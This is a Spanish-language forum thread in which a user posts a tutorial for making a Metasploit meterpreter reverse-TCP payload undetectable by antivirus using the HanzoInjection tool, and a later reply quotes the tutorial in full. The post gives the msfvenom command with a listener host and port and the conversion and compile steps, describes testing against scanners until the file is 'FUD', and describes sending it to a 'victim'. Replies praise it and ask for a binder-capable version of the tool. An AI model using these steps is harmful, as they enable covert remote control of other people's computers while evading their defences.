Underc0de

[In]Seguridad Informática => Análisis y desarrollo de malwares => Mensaje iniciado por: BrowserNet en Abril 19, 2016, 06:46:55 PM

Título: Burlando AV mediante HanzoInyection
Publicado por: BrowserNet en Abril 19, 2016, 06:46:55 PM
Buenas tardes soy nuevo en el foro mi seudonimo es Browsernet, tengo un blog algo conocido, creo que muchos de esta comunidad lo han visto.
Estare colgado contenido de mi autoria cada dia.

¿me preguntaran porque me uni a underc0de?

Yo humildemente respondere porque aqui "Estan los mejores"
#Saludos para todos,


(https://4.bp.blogspot.com/-9ftGFxgqThw/VsYrjepf0qI/AAAAAAAADbo/q2v2LgEz4uo/s1600/1.png)

Saludos mis fieles lectores en esta oportunidad vamos a convertir nuestra payload de Metasploit Framework creado en C# a executable con una herramienta poco conocida con algo de antigüedad llamada "HanzoInyection" que compila y codifica el código malicioso para hacerlos in-detectables de todos los Anti-Virus,

Descarga:
https://github.com/P0cL4bs/hanzoInjection

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~# git clone https://github.com/P0cL4bs/hanzoInjection.git

(https://2.bp.blogspot.com/-ADoI4DWoAvU/VsYvHPWA93I/AAAAAAAADb4/X8Sy1iKngFA/s1600/4.png)

una ves descargado el código pasaremos a ejecutar el  hanzoInyection.exe con la herramienta wine, aclarando lo siguiente la herramienta es multi plataforma, ya que puede ser utilizada en Windows y en Gnu/Linux.

Pero antes de utilizarlo, debemos crear nuestro payload en extensión .bin

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.217.128 lport=8080 -t raw -o /root/meterpreter.bin

(https://3.bp.blogspot.com/-72o-X_NaYF0/VsYwSX87PGI/AAAAAAAADcE/qbGRQhMk1UU/s640/1.png)

ya creado nuestro archivo, lo que haremos sera subir el payload "meterpreter.bin" a una web donde lo analice con todas las firmas de los Anti-Virus:

(https://1.bp.blogspot.com/-Y-1tA_gM1X8/VsYxE_rX5eI/AAAAAAAADcM/BhcQfjL3QHw/s1600/2.png)

(https://2.bp.blogspot.com/--SYJAYfanPg/VsYxFApnfuI/AAAAAAAADcQ/3w9OExmQBjE/s1600/3.png)

Como vemos solamente 2 Antivirus de 35 lo han detectado las cuales fueron "AVG y Clan Antivirus", continuando con lo siguiente el archivo meterpreter.bin se encuentra en la carpeta "ROOT", lo que haremos sera copiar dicho archivo a la carpeta hanzoInyection, de esta manera.

Para ejecutar  el archivo debemos añadir lo siguiente:

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~/hanzoInjection# wine HanzoInjection.exe

(https://3.bp.blogspot.com/-6LyevcFBNWw/VsYyUBKfIWI/AAAAAAAADcc/ZkaU3Ve1eNE/s1600/5.png)

Como podemos observar  nos muestra las opciones de dicha herramienta, entonces vamos a compilar nuestro archivo con extensión .bin  meterpreter.bin a extensión .cs = meterpreter.cs

(https://4.bp.blogspot.com/-wKLSIwGngm8/VsYzhApOk4I/AAAAAAAADco/-85-SroyTo8/s1600/6.png)

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~/hanzoInjection# wine HanzoInjection.exe -p meterpreter.bin -o meterpreter.cs

Como vemos se ha compilado correctamente el código, lo que haremos sera abrir el código en leafpad para copiar toda la fuente el archivo meterpreter.cs

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~/hanzoInjection# leafpad meterpreter.cs

(https://4.bp.blogspot.com/-vrNYRESn6jE/VsY0g-rcU5I/AAAAAAAADcw/Hn4V-JGSbDI/s1600/7.png)

Ya copiado  todo el código, abriremos otra terminal y ejecutaremos un editor de programación llamado "monodevelop".

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~#monodevelop

(https://4.bp.blogspot.com/-Kn5DUTYivJs/VsY1b41DmSI/AAAAAAAADc4/8xI8odwz8kA/s1600/8.png)

Ya abierto la plataforma vamos a dirigirnos a la pestaña "C#" y le daremos en el primer escenario "Proyecto de consola" luego escogemos el nombre y la ubicación donde se guardara nuestro proyecto,  en mi caso se llama "facebook" como podemos ver nos carga la ventada con el código Java, que llega por Defauld.

(https://2.bp.blogspot.com/-q1dRxxePAek/VsY2IqvgWDI/AAAAAAAADc8/cvezMZF5PSs/s1600/9.png)

Ahora pasaremos a pegar el código mencionado hace momentos meterpreter.cs

(https://2.bp.blogspot.com/-uBAPHxh5Ga0/VsY26FHcBlI/AAAAAAAADdE/A9HHryvChuM/s1600/10.png)

Ya copiado el código, lo que haremos sera añadir un paquete del inicio "XML" para validar la variable en uso System.Xml

(https://3.bp.blogspot.com/-Cgh3I--lFog/VsY3UP9SJII/AAAAAAAADdI/8_0pSe8tr_k/s1600/11.2.png)

Nos iremos a la pestaña "Referencias" > Editar

(https://3.bp.blogspot.com/-IkP8h_iJrWQ/VsY3yaZwQcI/AAAAAAAADdQ/m3rJ67AXaKE/s1600/11.5.png)

Ahora buscaremos el paquete System.Xml, activaremos la casilla y le damos "Aceptar"

(https://3.bp.blogspot.com/-8gOSGNkxvGM/VsY38OzEWdI/AAAAAAAADdY/6hUH0ll5GKE/s1600/11.png)

Ya terminado con la agregación de los paquetes, XML lo que haremos sera validar el código inseguro que no aceptara al compilar el ejecutable, las cuales son las siguientes lineas:

(https://2.bp.blogspot.com/-mdirh_5vASU/VsY4oR_NItI/AAAAAAAADdk/eagXmydaTLQ/s1600/12.5.png)
(https://1.bp.blogspot.com/-JLT2dfyCd3c/VsY4oS2XDuI/AAAAAAAADdg/gLoebVCzPUY/s1600/12.6.png)

Nos dirigiremos a la pestaña de herramientas "Proyecto" > Opciones de Facebook y haremos los siguientes procedimientos para permitir el "Bodigo inseguro"


Una ves terminado la configuración le daremos la tecla "F8" para crear nuestro archivo ejecutable, la cual estará en la ruta del proyecto que elegimos :)

(https://1.bp.blogspot.com/-JLT2dfyCd3c/VsY4oS2XDuI/AAAAAAAADdg/gLoebVCzPUY/s1600/12.6.png)
(https://3.bp.blogspot.com/-mufk2b0xgs0/VsY5QlFiFzI/AAAAAAAADds/fBCilYcpZME/s1600/13.png)
(https://3.bp.blogspot.com/-4WGj-5VoyIY/VsY5Q-m5VRI/AAAAAAAADdw/S6ikyz1Medg/s1600/14.png)

lo que haré sera activar nuestro servidor de escucha de msfconsole, con el puerto que hemos elegido al crear nuestro payload en msfvenom este caso: 8080.

(https://3.bp.blogspot.com/-rrkrVDkKmU0/VsY6B2ZiO5I/AAAAAAAADd8/e1GNnFQQINk/s1600/15.png)

Subiremos el archivo a la web de análisis, para comprobar si funciono nuestro proceso correctamente.

(https://4.bp.blogspot.com/-1tmBCApZoOk/VsY7nzGr5cI/AAAAAAAADeM/YMLXxi4a9no/s1600/16.png)

Como vemos es totalmente "FUD", ahora que ya tenemos nuestro archivo le enviaremos a nuestra victima:

(https://4.bp.blogspot.com/--iFzkkxGBsg/VsY8Fonh7TI/AAAAAAAADeU/_hnjfhJB2J0/s1600/17.png)

Nuestra victima acaba de abrir nuestro archivo y como el resultado no puede ser otro jaja, lo tenemos funcionando burlando al Malware Bytes Premium, Malwarebytes Anti-Exploit,  Avast Premier, IObit Malware Fighter, Advanced SystemCare Ultimate 9.

(https://4.bp.blogspot.com/-HP_CF3TaPoY/VsY8Ezvg_YI/AAAAAAAADeQ/gob-OMuG2Qg/s1600/18.png)

Gracias por visitar este POST.
Título: Re:Burlando AV mediante HanzoInyection
Publicado por: n0z en Abril 19, 2016, 10:00:40 PM
muy bueno y simple tu post browsernet,gracias por el aporte. Lo voy a tratar en par de dias a ver que tal hermano
Título: Re:Burlando AV mediante HanzoInyection
Publicado por: lapizacapuntas en Mayo 05, 2016, 07:43:58 PM
muy bueno el post ... lo probare... +10 gracias por compartir el segundo bien mas preciado del universo ... EL CONOCIMIENTO
Título: Re:Burlando AV mediante HanzoInyection
Publicado por: basharbachir en Noviembre 08, 2017, 05:05:07 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buenas tardes soy nuevo en el foro mi seudonimo es Browsernet, tengo un blog algo conocido, creo que muchos de esta comunidad lo han visto.
Estare colgado contenido de mi autoria cada dia.

¿me preguntaran porque me uni a underc0de?

Yo humildemente respondere porque aqui "Estan los mejores"
#Saludos para todos,


(https://4.bp.blogspot.com/-9ftGFxgqThw/VsYrjepf0qI/AAAAAAAADbo/q2v2LgEz4uo/s1600/1.png)

Saludos mis fieles lectores en esta oportunidad vamos a convertir nuestra payload de Metasploit Framework creado en C# a executable con una herramienta poco conocida con algo de antigüedad llamada "HanzoInyection" que compila y codifica el código malicioso para hacerlos in-detectables de todos los Anti-Virus,

Descarga:
https://github.com/P0cL4bs/hanzoInjection

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~# git clone https://github.com/P0cL4bs/hanzoInjection.git

(https://2.bp.blogspot.com/-ADoI4DWoAvU/VsYvHPWA93I/AAAAAAAADb4/X8Sy1iKngFA/s1600/4.png)

una ves descargado el código pasaremos a ejecutar el  hanzoInyection.exe con la herramienta wine, aclarando lo siguiente la herramienta es multi plataforma, ya que puede ser utilizada en Windows y en Gnu/Linux.

Pero antes de utilizarlo, debemos crear nuestro payload en extensión .bin

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.217.128 lport=8080 -t raw -o /root/meterpreter.bin

(https://3.bp.blogspot.com/-72o-X_NaYF0/VsYwSX87PGI/AAAAAAAADcE/qbGRQhMk1UU/s640/1.png)

ya creado nuestro archivo, lo que haremos sera subir el payload "meterpreter.bin" a una web donde lo analice con todas las firmas de los Anti-Virus:

(https://1.bp.blogspot.com/-Y-1tA_gM1X8/VsYxE_rX5eI/AAAAAAAADcM/BhcQfjL3QHw/s1600/2.png)

(https://2.bp.blogspot.com/--SYJAYfanPg/VsYxFApnfuI/AAAAAAAADcQ/3w9OExmQBjE/s1600/3.png)

Como vemos solamente 2 Antivirus de 35 lo han detectado las cuales fueron "AVG y Clan Antivirus", continuando con lo siguiente el archivo meterpreter.bin se encuentra en la carpeta "ROOT", lo que haremos sera copiar dicho archivo a la carpeta hanzoInyection, de esta manera.

Para ejecutar  el archivo debemos añadir lo siguiente:

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~/hanzoInjection# wine HanzoInjection.exe

(https://3.bp.blogspot.com/-6LyevcFBNWw/VsYyUBKfIWI/AAAAAAAADcc/ZkaU3Ve1eNE/s1600/5.png)

Como podemos observar  nos muestra las opciones de dicha herramienta, entonces vamos a compilar nuestro archivo con extensión .bin  meterpreter.bin a extensión .cs = meterpreter.cs

(https://4.bp.blogspot.com/-wKLSIwGngm8/VsYzhApOk4I/AAAAAAAADco/-85-SroyTo8/s1600/6.png)

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~/hanzoInjection# wine HanzoInjection.exe -p meterpreter.bin -o meterpreter.cs

Como vemos se ha compilado correctamente el código, lo que haremos sera abrir el código en leafpad para copiar toda la fuente el archivo meterpreter.cs

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~/hanzoInjection# leafpad meterpreter.cs

(https://4.bp.blogspot.com/-vrNYRESn6jE/VsY0g-rcU5I/AAAAAAAADcw/Hn4V-JGSbDI/s1600/7.png)

Ya copiado  todo el código, abriremos otra terminal y ejecutaremos un editor de programación llamado "monodevelop".

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~#monodevelop

(https://4.bp.blogspot.com/-Kn5DUTYivJs/VsY1b41DmSI/AAAAAAAADc4/8xI8odwz8kA/s1600/8.png)

Ya abierto la plataforma vamos a dirigirnos a la pestaña "C#" y le daremos en el primer escenario "Proyecto de consola" luego escogemos el nombre y la ubicación donde se guardara nuestro proyecto,  en mi caso se llama "facebook" como podemos ver nos carga la ventada con el código Java, que llega por Defauld.

(https://2.bp.blogspot.com/-q1dRxxePAek/VsY2IqvgWDI/AAAAAAAADc8/cvezMZF5PSs/s1600/9.png)

Ahora pasaremos a pegar el código mencionado hace momentos meterpreter.cs

(https://2.bp.blogspot.com/-uBAPHxh5Ga0/VsY26FHcBlI/AAAAAAAADdE/A9HHryvChuM/s1600/10.png)

Ya copiado el código, lo que haremos sera añadir un paquete del inicio "XML" para validar la variable en uso System.Xml

(https://3.bp.blogspot.com/-Cgh3I--lFog/VsY3UP9SJII/AAAAAAAADdI/8_0pSe8tr_k/s1600/11.2.png)

Nos iremos a la pestaña "Referencias" > Editar

(https://3.bp.blogspot.com/-IkP8h_iJrWQ/VsY3yaZwQcI/AAAAAAAADdQ/m3rJ67AXaKE/s1600/11.5.png)

Ahora buscaremos el paquete System.Xml, activaremos la casilla y le damos "Aceptar"

(https://3.bp.blogspot.com/-8gOSGNkxvGM/VsY38OzEWdI/AAAAAAAADdY/6hUH0ll5GKE/s1600/11.png)

Ya terminado con la agregación de los paquetes, XML lo que haremos sera validar el código inseguro que no aceptara al compilar el ejecutable, las cuales son las siguientes lineas:

(https://2.bp.blogspot.com/-mdirh_5vASU/VsY4oR_NItI/AAAAAAAADdk/eagXmydaTLQ/s1600/12.5.png)
(https://1.bp.blogspot.com/-JLT2dfyCd3c/VsY4oS2XDuI/AAAAAAAADdg/gLoebVCzPUY/s1600/12.6.png)

Nos dirigiremos a la pestaña de herramientas "Proyecto" > Opciones de Facebook y haremos los siguientes procedimientos para permitir el "Bodigo inseguro"


Una ves terminado la configuración le daremos la tecla "F8" para crear nuestro archivo ejecutable, la cual estará en la ruta del proyecto que elegimos :)

(https://1.bp.blogspot.com/-JLT2dfyCd3c/VsY4oS2XDuI/AAAAAAAADdg/gLoebVCzPUY/s1600/12.6.png)
(https://3.bp.blogspot.com/-mufk2b0xgs0/VsY5QlFiFzI/AAAAAAAADds/fBCilYcpZME/s1600/13.png)
(https://3.bp.blogspot.com/-4WGj-5VoyIY/VsY5Q-m5VRI/AAAAAAAADdw/S6ikyz1Medg/s1600/14.png)

lo que haré sera activar nuestro servidor de escucha de msfconsole, con el puerto que hemos elegido al crear nuestro payload en msfvenom este caso: 8080.

(https://3.bp.blogspot.com/-rrkrVDkKmU0/VsY6B2ZiO5I/AAAAAAAADd8/e1GNnFQQINk/s1600/15.png)

Subiremos el archivo a la web de análisis, para comprobar si funciono nuestro proceso correctamente.

(https://4.bp.blogspot.com/-1tmBCApZoOk/VsY7nzGr5cI/AAAAAAAADeM/YMLXxi4a9no/s1600/16.png)

Como vemos es totalmente "FUD", ahora que ya tenemos nuestro archivo le enviaremos a nuestra victima:

(https://4.bp.blogspot.com/--iFzkkxGBsg/VsY8Fonh7TI/AAAAAAAADeU/_hnjfhJB2J0/s1600/17.png)

Nuestra victima acaba de abrir nuestro archivo y como el resultado no puede ser otro jaja, lo tenemos funcionando burlando al Malware Bytes Premium, Malwarebytes Anti-Exploit,  Avast Premier, IObit Malware Fighter, Advanced SystemCare Ultimate 9.

(https://4.bp.blogspot.com/-HP_CF3TaPoY/VsY8Ezvg_YI/AAAAAAAADeQ/gob-OMuG2Qg/s1600/18.png)

Gracias por visitar este POST.

thanks alot but the new source in github has not binder option -b
can any one please to upload the old one ?